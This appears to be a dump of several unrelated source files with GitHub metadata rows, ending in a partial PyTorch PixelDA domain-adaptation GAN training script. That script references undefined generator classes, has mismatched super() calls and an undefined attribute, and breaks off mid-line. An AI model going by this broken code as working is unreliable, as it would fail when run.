all `decoder_input_ids` of shape `(batch_size, sequence_length)`.
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss. Indices should either be in `[0, ...,
config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored
(masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`.
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding
(see `past_key_values`).
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
Returns:
Example:
```python
>>> from transformers import AutoTokenizer, BlenderbotSmallForCausalLM
>>> tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot_small-90M")
>>> model = BlenderbotSmallForCausalLM.from_pretrained(
... "facebook/blenderbot_small-90M", add_cross_attention=False
... )
>>> assert model.config.is_decoder, f"{model.__class__} has to be configured as a decoder."
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
>>> logits = outputs.logits
>>> expected_shape = [1, inputs.input_ids.shape[-1], model.config.vocab_size]
>>> list(logits.shape) == expected_shape
True
```"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)
outputs = self.model.decoder(
input_ids=input_ids,
attention_mask=attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
head_mask=head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
logits = self.lm_head(outputs[0])
loss = None
if labels is not None:
labels = labels.to(logits.device)
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[1:]
return (loss,) + output if loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=loss,
logits=logits,
past_key_values=outputs.past_key_values,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
def prepare_inputs_for_generation(
self, input_ids, past_key_values=None, attention_mask=None, use_cache=None, **kwargs
):
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
attention_mask = input_ids.new_ones(input_ids.shape)
if past_key_values:
input_ids = input_ids[:, -1:]
# first step, decoder_cached_states are empty
return {
"input_ids": input_ids, # encoder_outputs is defined. input_ids not needed
"attention_mask": attention_mask,
"past_key_values": past_key_values,
"use_cache": use_cache,
}
@staticmethod
def _reorder_cache(past_key_values, beam_idx):
reordered_past = ()
for layer_past in past_key_values:
reordered_past += (tuple(past_state.index_select(0, beam_idx) for past_state in layer_past),)
return reordered_past
| [
"noreply@github.com"
] | huggingface.noreply@github.com |
be45c7de7915d1e3540fc93c4a9d108362a73d1c | 846c2bc8e37673476af67c7c6dd2f64faa4213f1 | /autofeat/generate_error.py | 8fb8b2112890d300b1dbd52670c2fbf5f914e6e1 | [
"MIT"
] | permissive | FelixNeutatz/LassoLarsCVBugGenerator | b759221da9e438ce5c9ed4c229a411fb10424646 | 40aa61e1164676cc4e55ae145c41304b6e5c36c0 | refs/heads/master | 2020-04-25T16:34:00.320062 | 2019-03-19T13:19:25 | 2019-03-19T13:19:25 | 172,917,192 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | from autofeat import AutoFeatRegression
import numpy as np
import pandas as pd
import sklearn.linear_model as lm
X = np.load('data/X.npy')
target = np.load('data/y.npy')
afreg = AutoFeatRegression(n_jobs=4)
try:
df = afreg.fit_transform(X, target)
except:
eps = 1e-08
X = np.load('/tmp/X_error.npy')
target = np.load('/tmp/target_error.npy')
reg = lm.LassoLarsCV(eps=eps)
reg.fit(X, target)
| [
"neutatz@googlemail.com"
] | neutatz@googlemail.com |
d58edd9ba4df1a10a0c057dbc474e1f1af8907ec | 6f05f7d5a67b6bb87956a22b988067ec772ba966 | /data/test/python/b451bd6e6c110e9e39aef80f9b63f26a2e0ec713settings.py | b451bd6e6c110e9e39aef80f9b63f26a2e0ec713 | [
"MIT"
] | permissive | harshp8l/deep-learning-lang-detection | 93b6d24a38081597c610ecf9b1f3b92c7d669be5 | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | refs/heads/master | 2020-04-07T18:07:00.697994 | 2018-11-29T23:21:23 | 2018-11-29T23:21:23 | 158,597,498 | 0 | 0 | MIT | 2018-11-21T19:36:42 | 2018-11-21T19:36:41 | null | UTF-8 | Python | false | false | 522 | py | #
# enable giraffe's requirements and some of the giraffe apps
#
INSTALLED_APPS = (
# ...
# all your other apps, plus:
'south',
'djcelery',
'giraffe.aggregator',
'giraffe.publisher',
)
#
# django-celery settings:
#
# http://celeryq.org/docs/django-celery/getting-started/first-steps-with-django.html
#
BROKER_HOST = 'localhost'
BROKER_PORT = 5672
BROKER_USER = 'giraffe'
BROKER_PASSWORD = 'giraffe'
BROKER_VHOST = '/'
CELERY_RESULT_BACKEND = 'amqp'
import djcelery
djcelery.setup_loader()
| [
"aliostad+github@gmail.com"
] | aliostad+github@gmail.com |
f8a5912c87c8cc8130cf9cee0bde06306260708d | 0188f7dfe26a2b7f925814f202a9be653abcb859 | /prodinward/models.py | a30818056578c48db2b3b619a37bf03fb39e0f50 | [] | no_license | viralsir/Furniture_Inhouse_app | d5ac0a764681816dd63451b7d82303f1538ef2ec | d194251e93c537305d97eff968a5584a4c9de12b | refs/heads/master | 2023-06-15T16:03:07.386722 | 2021-07-08T10:43:14 | 2021-07-08T10:43:14 | 377,119,495 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | from django.db import models
from django.urls import reverse
from product.models import product
# Create your models here.
class prodinward(models.Model):
prod = models.ForeignKey(product, on_delete=models.CASCADE, related_name="product")
quantity = models.CharField(max_length=100)
rate = models.FloatField(max_length=100)
price = models.FloatField(max_length=100)
discount = models.FloatField(max_length=100, blank=True, null=True)
gst = models.FloatField(max_length=100, blank=True, null=True)
is_biiled=models.BooleanField(default=False)
billed=models.IntegerField(default=0)
def __str__(self):
return f"{self.price}"
def get_absolute_url(self):
return reverse("closed") | [
"viralsir2018@gmail.com"
] | viralsir2018@gmail.com |
768714cdb17e4f577667dce3bd002cfd50f0e577 | c5675cf0c2a83075e8a76ff54caa7384e4f4d554 | /mdevbox/forms.py | c8320d31b7b1db820b88db4d693ec0ff62d96072 | [] | no_license | Quantumke/mdevbox | 68969742a828e22166750c0dfb00d5d3b21f30da | 6d696423af00f7cd899e5bcfa8dc3f792de19891 | refs/heads/master | 2016-09-13T06:23:21.595605 | 2016-05-06T08:47:13 | 2016-05-06T08:47:13 | 56,508,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | from mdevbox.models import *
from django.contrib.auth.models import User
from django import forms
from .models import *
#-------------------------------------------------------------------------------------------------------------------- user auth
class developersemployment(forms.ModelForm):
class Meta:
model = developers_employment
fields = ('email', 'speciality', 'previous_employer', 'role_previous_employment','begin_previous_employment','end_previous_employment',)
class developerseducation(forms.ModelForm):
class Meta:
model=developers_education
fields=('highest_education', 'institute_name','course','begin_education','end_education')
class developersportfolio(forms.ModelForm):
class Meta:
model=developers_portfolio
fields=( 'portfoli_name', 'portfoli_tech', 'portfoli_link', 'portfoli_desc',)
class hire(forms.ModelForm):
class Meta:
model=hire
fields=('company','job_title','job_description', )
class postjob(forms.ModelForm):
class Meta:
model=post_job
fields=('company', 'job_title', 'job_description', 'pay',)
| [
"nguruben@gmail.com"
] | nguruben@gmail.com |
0522f8ff0a25769612c10267738a1c953edf88f6 | 961ddbe3e6a75339cf94679e0a7d313cd7a6c1d9 | /goods/urls.py | 3a54b874b8b147e627a2bbb7a0753d45296a6c58 | [
"Apache-2.0"
] | permissive | chinxianjun2016/GreaterWMS | 41b3a8d855f7f00f5bd91364339640f049a3b7dc | aacd0e15e0114f103eb57002e93670c008cce63b | refs/heads/master | 2023-02-07T13:24:10.313463 | 2021-01-02T01:52:41 | 2021-01-02T01:52:41 | 322,737,456 | 0 | 0 | Apache-2.0 | 2021-01-02T01:52:42 | 2020-12-19T00:50:07 | null | UTF-8 | Python | false | false | 1,112 | py | """singosgu URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, re_path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path(r'', views.APIViewSet.as_view({"get": "list", "post": "create"}), name="goods"),
re_path(r'^(?P<pk>\d+)/$', views.APIViewSet.as_view({
'get': 'retrieve',
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy'
}), name="goods_1"),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"singosgu@gmail.com"
] | singosgu@gmail.com |
e9bf2dd1bb681537e355f54163005cd1bb9143ea | 8839bd1f2e35726b6c8066985690fa2fa86b09a6 | /5.pyAI-K210/1.基础实验/4.外部中断/main.py | 5e4efe593247c0e8f7668025ad9582d34f1f0e97 | [
"MIT"
] | permissive | elektrik-elektronik-muhendisligi/MicroPython-Examples-1 | a9532b06aba470f7f26f841929f4fb145549f70b | f7b08e95ff73e3417af21918c9c6bcf2f83281c6 | refs/heads/master | 2021-05-25T22:58:36.207098 | 2020-04-01T09:50:53 | 2020-04-01T09:50:53 | 253,956,073 | 1 | 0 | null | 2020-04-08T01:39:46 | 2020-04-08T01:39:45 | null | UTF-8 | Python | false | false | 726 | py | '''
实验名称:外部中断
版本: v1.0
日期: 2019.12
作者: 01Studio
说明:通过按键改变 LED 的亮灭状态(外部中断方式)
'''
from Maix import GPIO
from fpioa_manager import fm
import utime
#注册IO,注意高速GPIO口才有中断
fm.register(12, fm.fpioa.GPIO0)
fm.register(16, fm.fpioa.GPIOHS0)
#构建lED和KEY对象
LED_B=GPIO(GPIO.GPIO0,GPIO.OUT,value=1)
KEY=GPIO(GPIO.GPIOHS0, GPIO.IN, GPIO.PULL_UP)
#LED状态表示
state = 1
#中断回调函数
def fun(KEY):
global state
utime.sleep_ms(10) #消除抖动
if KEY.value()==0: #确认按键被按下
state = not state
LED_B.value(state)
#开启中断,下降沿触发
KEY.irq(fun, GPIO.IRQ_FALLING)
| [
"237827161@qq.com"
] | 237827161@qq.com |
0aef20c455303401003a675deed4e7888a3a0865 | a86ca34e23afaf67fdf858df9e47847606b23e0c | /lib/temboo/Library/Amazon/Marketplace/Reports/MerchantListingsReport.py | f9c80bd5c6ad689f862a6e51a89af891e22ad131 | [] | no_license | miriammelnick/dont-get-mugged | 6026ad93c910baaecbc3f5477629b0322e116fa8 | 1613ee636c027ccc49c3f84a5f186e27de7f0f9d | refs/heads/master | 2021-01-13T02:18:39.599323 | 2012-08-12T23:25:47 | 2012-08-12T23:25:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,736 | py |
###############################################################################
#
# MerchantListingsReport
# Returns a tab-delimited report of active listings.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
class MerchantListingsReport(Choreography):
"""
Create a new instance of the MerchantListingsReport Choreography. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
def __init__(self, temboo_session):
Choreography.__init__(self, temboo_session, '/Library/Amazon/Marketplace/Reports/MerchantListingsReport')
def new_input_set(self):
return MerchantListingsReportInputSet()
def _make_result_set(self, result, path):
return MerchantListingsReportResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return MerchantListingsReportChoreographyExecution(session, exec_id, path)
"""
An InputSet with methods appropriate for specifying the inputs to the MerchantListingsReport
choreography. The InputSet object is used to specify input parameters when executing this choreo.
"""
class MerchantListingsReportInputSet(InputSet):
"""
Set the value of the AWSAccessKeyId input for this choreography. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
def set_AWSAccessKeyId(self, value):
InputSet._set_input(self, 'AWSAccessKeyId', value)
"""
Set the value of the AWSMarketplaceId input for this choreography. ((required, string) The Marketplace ID provided by Amazon Web Services.)
"""
def set_AWSMarketplaceId(self, value):
InputSet._set_input(self, 'AWSMarketplaceId', value)
"""
Set the value of the AWSMerchantId input for this choreography. ((required, string) The Merchant ID provided by Amazon Web Services.)
"""
def set_AWSMerchantId(self, value):
InputSet._set_input(self, 'AWSMerchantId', value)
"""
Set the value of the AWSSecretKeyId input for this choreography. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
def set_AWSSecretKeyId(self, value):
InputSet._set_input(self, 'AWSSecretKeyId', value)
"""
Set the value of the Endpoint input for this choreography. ((optional, string) The base URL for the MWS endpoint. Defaults to mws.amazonservices.co.uk.)
"""
def set_Endpoint(self, value):
InputSet._set_input(self, 'Endpoint', value)
"""
Set the value of the TimeToWait input for this choreography. ((optional, integer) By default, the Choreo will wait for 5 minutes to see if the report is ready for retrieval. Max is 120 minutes.)
"""
def set_TimeToWait(self, value):
InputSet._set_input(self, 'TimeToWait', value)
"""
A ResultSet with methods tailored to the values returned by the MerchantListingsReport choreography.
The ResultSet object is used to retrieve the results of a choreography execution.
"""
class MerchantListingsReportResultSet(ResultSet):
"""
Retrieve the value for the "Report" output from this choreography execution. ((multiline) The report contents.)
"""
def get_Report(self):
return self._output.get('Report', None)
"""
Retrieve the value for the "GeneratedReportId" output from this choreography execution. ((integer) The GeneratedReportId parsed from the Amazon response.)
"""
def get_GeneratedReportId(self):
return self._output.get('GeneratedReportId', None)
"""
Retrieve the value for the "ReportProcessingStatus" output from this choreography execution. ((string) The status of the report request parsed from the Amazon response.)
"""
def get_ReportProcessingStatus(self):
return self._output.get('ReportProcessingStatus', None)
"""
Retrieve the value for the "ReportRequestId" output from this choreography execution. ((integer) The ReportRequestId parsed from the Amazon response. This id is used in GetReportRequestList.)
"""
def get_ReportRequestId(self):
return self._output.get('ReportRequestId', None)
class MerchantListingsReportChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return MerchantListingsReportResultSet(response, path)
| [
"miriam@famulus"
] | miriam@famulus |
d404e0bda811fd33c2e96dbfaa0870131e8184a9 | fe19d2fac4580d463132e61509bd6e3cc2cf958d | /toontown/speedchat/TTSCHalloweenMenu.py | 9451e1ceac323d44fae4773d6c57b1a6f0a65bf7 | [] | no_license | t00nt0wn1dk/c0d3 | 3e6db6dd42c3aa36ad77709cf9016176a3f3a44f | 7de105d7f3de0f8704b020e32fd063ee2fad8d0d | refs/heads/master | 2021-01-01T16:00:15.367822 | 2015-03-21T21:25:52 | 2015-03-21T21:25:55 | 32,647,654 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,911 | py | # 2013.08.22 22:25:08 Pacific Daylight Time
# Embedded file name: toontown.speedchat.TTSCHalloweenMenu
from direct.showbase import PythonUtil
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCMenuHolder import SCMenuHolder
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from otp.otpbase import OTPLocalizer
HalloweenMenu = [(OTPLocalizer.HalloweenMenuSections[0], [30250, 30251, 30252])]
class TTSCHalloweenMenu(SCMenu):
__module__ = __name__
def __init__(self):
SCMenu.__init__(self)
self.__messagesChanged()
def destroy(self):
SCMenu.destroy(self)
def clearMenu(self):
SCMenu.clearMenu(self)
def __messagesChanged(self):
self.clearMenu()
try:
lt = base.localAvatar
except:
return
for section in HalloweenMenu:
if section[0] == -1:
for phrase in section[1]:
if phrase not in OTPLocalizer.SpeedChatStaticText:
print 'warning: tried to link Halloween phrase %s which does not seem to exist' % phrase
break
self.append(SCStaticTextTerminal(phrase))
else:
menu = SCMenu()
for phrase in section[1]:
if phrase not in OTPLocalizer.SpeedChatStaticText:
print 'warning: tried to link Halloween phrase %s which does not seem to exist' % phrase
break
menu.append(SCStaticTextTerminal(phrase))
menuName = str(section[0])
self.append(SCMenuHolder(menuName, menu))
# okay decompyling C:\Users\Maverick\Documents\Visual Studio 2010\Projects\Unfreezer\py2\toontown\speedchat\TTSCHalloweenMenu.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2013.08.22 22:25:08 Pacific Daylight Time
| [
"anonymoustoontown@gmail.com"
] | anonymoustoontown@gmail.com |
5cadfcc566e5d20ec4df60ec331f7b1069d07004 | 5d3c546ed535fda1a62c2bd1a2dd36d86ea3049d | /manage.py | 55843edd0f9d4f7175279abbc27ee7621badd553 | [] | no_license | rcthomas/decals-web | 6e642082c7daf22f41f3f1ed0ea4db6f74bed682 | 64467865227d33124f42febdbd09e49e64e0dbfa | refs/heads/master | 2021-05-10T15:46:42.048404 | 2018-01-22T20:06:09 | 2018-01-22T20:06:09 | 118,561,087 | 0 | 0 | null | 2018-01-23T05:13:27 | 2018-01-23T05:13:26 | null | UTF-8 | Python | false | false | 249 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "decals.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"dstndstn@gmail.com"
] | dstndstn@gmail.com |
690d8d6d04910f8f8a9d04cfd88444c258e5ac33 | 00fc9d9e0de636809a66a05ddc8264682fb46297 | /.history/implementations/pixelda/pixelda_try_20190106191202.py | 947a40ba80662b98b8dc38df4f9ffb34f19e695c | [
"MIT"
] | permissive | Napkin-DL/PyTorch-GAN | 56746d490da1064cd895be4825f8b8c96acb36fa | 4668fb434a74a4e4771631944e4abfb0ec1c8795 | refs/heads/master | 2020-04-14T07:55:12.381763 | 2019-01-06T11:51:52 | 2019-01-06T11:51:52 | 163,724,755 | 0 | 0 | MIT | 2019-01-01T08:59:51 | 2019-01-01T08:59:51 | null | UTF-8 | Python | false | false | 17,169 | py | import argparse
import os
import numpy as np
import math
import itertools
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
from mnistm import MNISTM
import torch.nn as nn
import torch.nn.functional as F
import torch
os.makedirs('images', exist_ok=True)
parser = argparse.ArgumentParser()
parser.add_argument('--n_epochs', type=int, default=200, help='number of epochs of training')
parser.add_argument('--batch_size', type=int, default=64, help='size of the batches')
parser.add_argument('--lr', type=float, default=0.0002, help='adam: learning rate')
parser.add_argument('--b1', type=float, default=0.5, help='adam: decay of first order momentum of gradient')
parser.add_argument('--b2', type=float, default=0.999, help='adam: decay of first order momentum of gradient')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
parser.add_argument('--n_residual_blocks', type=int, default=1, help='number of residual blocks in generator')
parser.add_argument('--latent_dim', type=int, default=10, help='dimensionality of the noise input')
parser.add_argument('--img_size', type=int, default=32, help='size of each image dimension')
parser.add_argument('--channels', type=int, default=3, help='number of image channels')
parser.add_argument('--n_classes', type=int, default=10, help='number of classes in the dataset')
parser.add_argument('--sample_interval', type=int, default=300, help='interval betwen image samples')
opt = parser.parse_args()
print(opt)
# Calculate output of image discriminator (PatchGAN)
patch = int(opt.img_size / 2**4)
patch = (1, patch, patch)
cuda = True if torch.cuda.is_available() else False
print("cuda : {}".format(cuda))
def weights_init_normal(m):
classname = m.__class__.__name__
print("classname : {}".format(classname))
if classname.find('Conv') != -1:
torch.nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
torch.nn.init.normal_(m.weight.data, 1.0, 0.02)
torch.nn.init.constant_(m.bias.data, 0.0)
class encode_ResidualBlock1(nn.Module):
def __init__(self, in_features=32, out_features=64, kernel_size=3, stride=2, padding=1):
super(encode_ResidualBlock1, self).__init__()
self.block = nn.Sequential(
nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size= kernel_size, stride = stride, padding=padding),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2, inplace=True)
)
def forward(self, x):
encode_x = self.block(x)
return x, encode_x
class encode_ResidualBlock2(nn.Module):
def __init__(self, in_features=64, out_features=128, kernel_size=3, stride=2, padding=1):
super(encode_ResidualBlock2, self).__init__()
self.block = nn.Sequential(
nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size= kernel_size, stride = stride, padding=padding),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2, inplace=True)
)
def forward(self, x):
encode_x = self.block(x)
return encode_x
class encode_ResidualBlock3(nn.Module):
def __init__(self, in_features=128, out_features=256, kernel_size=3, stride=2, padding=1):
super(encode_ResidualBlock3, self).__init__()
self.block = nn.Sequential(
nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size= kernel_size, stride = stride, padding=padding),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2, inplace=True)
)
def forward(self, x):
encode_x = self.block(x)
return encode_x
class decode_ResidualBlock1(nn.Module):
def __init__(self, in_features=256, out_features=128, kernel_size=3, stride=2, padding=1):
super(decode_ResidualBlock1, self).__init__()
self.block = nn.Sequential(
nn.ConvTranspose2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size, stride=stride, padding=padding),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2, inplace=True)
)
def forward(self, encode_x):
decode_x = self.block(encode_x)
return decode_x
class decode_ResidualBlock2(nn.Module):
def __init__(self, in_features=128, out_features=64, kernel_size=3, stride=2, padding=1):
super(decode_ResidualBlock2, self).__init__()
self.block = nn.Sequential(
nn.ConvTranspose2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size, stride=stride, padding=padding),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2, inplace=True)
)
def forward(self, encode_x):
decode_x = self.block(encode_x)
return decode_x
class decode_ResidualBlock3(nn.Module):
def __init__(self, in_features=64, out_features=32, kernel_size=3, stride=2, padding=1):
super(decode_ResidualBlock3, self).__init__()
self.block = nn.Sequential(
nn.ConvTranspose2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size, stride=stride, padding=padding),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2, inplace=True)
)
def forward(self, encode_x):
decode_x = self.decode_block(encode_x)
return decode_x
class encode_Generator(nn.Module):
def __init__(self):
super(encode_Generator, self).__init__()
# Fully-connected layer which constructs image channel shaped output from noise
self.fc = nn.Linear(opt.latent_dim, opt.channels*opt.img_size**2)
self.l1 = nn.Sequential(nn.Conv2d(opt.channels*2, 32, 3, 1, 1), nn.ReLU(inplace=True))
self.encode_resblocks1 = encode_ResidualBlock1()
self.encode_resblocks2 = encode_ResidualBlock2()
self.encode_resblocks3 = encode_ResidualBlock3()
def forward(self, img, z):
gen_input = torch.cat((img, self.fc(z).view(*img.shape)), 1)
encode_x = self.l1(gen_input)
x, encode_out1 = self.encode_resblocks1(encode_x)
encode_out2 = self.encode_resblocks2(encode_out1)
encode_out3 = self.encode_resblocks3(encode_out2)
return x, encode_out1, encode_out2, encode_out3
class decode_Generator(nn.Module):
def __init__(self):
super(Generator, self).__init__()
# Fully-connected layer which constructs image channel shaped output from noise
self.decode_resblocks1 = decode_ResidualBlock1()
self.decode_resblocks2 = decode_ResidualBlock2()
self.decode_resblocks3 = decode_ResidualBlock3()
self.l2 = nn.Sequential(nn.Conv2d(32, opt.channels, 3, 1, 1), nn.Tanh())
def forward(self, x, encode_out1, encode_out2, encode_out3):
decode_out1 = encode_out2 + self.decode_resblocks1(encode_out3)
decode_out2 = encode_out1 + self.decode_resblocks2(decode_out1)
decode_out3 = x + self.decode_resblocks3(decode_out2)
decode_x = decode_out3[:, :, :-1, :-1]
decode_x = F.sigmoid(decode_x)
out = img + decode_x
img_ = self.l2(out)
return img_
class encode_Discriminator(nn.Module):
def __init__(self):
super(encode_Discriminator, self).__init__()
def block(in_features, out_features, normalization=True):
"""Discriminator block"""
layers = [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),
nn.LeakyReLU(0.2, inplace=True) ]
if normalization:
layers.append(nn.InstanceNorm2d(out_features))
return layers
self.model = nn.Sequential(
*block(512, 64, normalization=False),
*block(64, 128),
*block(128, 256),
*block(256, 512),
nn.Conv2d(512, 1, 3, 1, 1)
)
def forward(self, encode_x):
validity = self.model(encode_x)
return validity
class Discriminator(nn.Module):
def __init__(self):
super(Discriminator, self).__init__()
def block(in_features, out_features, normalization=True):
"""Discriminator block"""
layers = [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),
nn.LeakyReLU(0.2, inplace=True) ]
if normalization:
layers.append(nn.InstanceNorm2d(out_features))
return layers
self.model = nn.Sequential(
*block(opt.channels, 64, normalization=False),
*block(64, 128),
*block(128, 256),
*block(256, 512),
nn.Conv2d(512, 1, 3, 1, 1)
)
def forward(self, img):
validity = self.model(img)
return validity
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
def block(in_features, out_features, normalization=True):
"""Classifier block"""
layers = [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),
nn.LeakyReLU(0.2, inplace=True) ]
if normalization:
layers.append(nn.InstanceNorm2d(out_features))
return layers
self.model = nn.Sequential(
*block(opt.channels, 64, normalization=False),
*block(64, 128),
*block(128, 256),
*block(256, 512)
)
input_size = opt.img_size // 2**4
self.output_layer = nn.Sequential(
nn.Linear(512*input_size**2, opt.n_classes),
nn.Softmax()
)
def forward(self, img):
feature_repr = self.model(img)
feature_repr = feature_repr.view(feature_repr.size(0), -1)
label = self.output_layer(feature_repr)
return label
# Loss function
adversarial_loss = torch.nn.MSELoss()
encode_adversarial_loss = torch.nn.MSELoss()
task_loss = torch.nn.CrossEntropyLoss()
# Loss weights
lambda_adv = 1
lambda_task = 0.1
# Initialize generator and discriminator
target_encode_generator = target_encode_Generator()
source_encode_generator = source_encode_Generator()
decode_generator = decode_Generator()
encode_discriminator = encode_Discriminator()
discriminator = Discriminator()
classifier = Classifier()
if cuda:
target_encode_generator.cuda()
source_encode_generator.cuda()
decode_generator.cuda()
encode_discriminator.cuda()
discriminator.cuda()
classifier.cuda()
adversarial_loss.cuda()
encode_adversarial_loss.cuda()
task_loss.cuda()
# Initialize weights
target_encode_generator.apply(weights_init_normal)
source_encode_generator.apply(weights_init_normal)
decode_generator.apply(weights_init_normal)
encode_discriminator.apply(weights_init_normal)
discriminator.apply(weights_init_normal)
classifier.apply(weights_init_normal)
# Configure data loader
os.makedirs('../../data/mnist', exist_ok=True)
dataloader_A = torch.utils.data.DataLoader(
datasets.MNIST('../../data/mnist', train=True, download=True,
transform=transforms.Compose([
transforms.Resize(opt.img_size),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])),
batch_size=opt.batch_size, shuffle=True)
os.makedirs('../../data/mnistm', exist_ok=True)
dataloader_B = torch.utils.data.DataLoader(
MNISTM('../../data/mnistm', train=True, download=True,
transform=transforms.Compose([
transforms.Resize(opt.img_size),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])),
batch_size=opt.batch_size, shuffle=True)
# Optimizers
optimizer_G = torch.optim.Adam( itertools.chain(target_encode_generator.parameters(),
source_encode_generator.parameters(),
decode_generator.parameters(),
classifier.parameters()),
lr=opt.lr, betas=(opt.b1, opt.b2))
optimizer_D = torch.optim.Adam(itertools.chain(encode_discriminator.parameters(), discriminator.parameters()), lr=opt.lr, betas=(opt.b1, opt.b2))
FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
LongTensor = torch.cuda.LongTensor if cuda else torch.LongTensor
# ----------
# Training
# ----------
# Keeps 100 accuracy measurements
task_performance = []
target_performance = []
for epoch in range(opt.n_epochs):
for i, ((imgs_A, labels_A), (imgs_B, labels_B)) in enumerate(zip(dataloader_A, dataloader_B)):
batch_size = imgs_A.size(0)
# Adversarial ground truths
valid = Variable(FloatTensor(batch_size, *patch).fill_(1.0), requires_grad=False)
fake = Variable(FloatTensor(batch_size, *patch).fill_(0.0), requires_grad=False)
encode_valid = Variable(FloatTensor(batch_size, *patch).fill_(1.0), requires_grad=False)
encode_fake = Variable(FloatTensor(batch_size, *patch).fill_(0.0), requires_grad=False)
# Configure input
imgs_A = Variable(imgs_A.type(FloatTensor).expand(batch_size, 3, opt.img_size, opt.img_size))
labels_A = Variable(labels_A.type(LongTensor))
imgs_B = Variable(imgs_B.type(FloatTensor))
# -----------------
# Train Generator
# -----------------
optimizer_G.zero_grad()
# Sample noise
z = Variable(FloatTensor(np.random.uniform(-1, 1, (batch_size, opt.latent_dim))))
# Generate a batch of images
imgs_A_x, encode_fake_B = source_encode_generator(imgs_A, z)
decode_fake_B = decode_generator(imgs_A_x, encode_fake_B)
# Perform task on translated source image
label_pred = classifier(decode_fake_B)
# Calculate the task loss
task_loss_ = (task_loss(label_pred, labels_A) + \
task_loss(classifier(imgs_A), labels_A)) / 2
# Loss measures generator's ability to fool the discriminator
g_loss = lambda_adv * adversarial_loss(discriminator(decode_fake_B), valid) + \
